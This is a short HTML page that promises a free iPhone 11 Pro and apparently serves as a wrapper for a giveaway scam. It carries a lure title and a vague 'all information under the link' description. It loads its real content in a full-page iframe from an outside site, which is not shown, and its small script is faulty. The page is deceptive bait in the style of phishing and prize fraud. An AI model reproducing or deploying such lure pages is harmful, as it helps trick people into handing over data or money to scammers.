<!DOCTYPE html>
<html lang = "ru">
  <head>
    <title>The new iphone 11 pro could be yours!</title>
         
    <meta charset = "utf-8">
    <meta name="description" content="All information can be found under the link">
    <meta property="og:image" content="https://amymalloy.com/lend/img/main.jpg">
  </head>
  <style>
      html{
          overflow-x: hidden !important;
      }
      body{
          padding: 0 !important;
          margin: 0 !important;
      }
      iframe{
          width: 100% !important;
          height: 2050px !important;
      }
      .pd{
          margin: 0 !important;
      }
  </style>
  <body style = "margin: 0 !important;">
    <iframe src = "https://amymalloy.com/lend/index.php">
         
    </iframe>
    <script>
        window.onload = function(){
            
            var body = document.querySelectorAll("body");
            for(var i = 0; i < body.length; i++){
                body.classList.add("pd");
            }
        }
    </script>
  </body>
</html>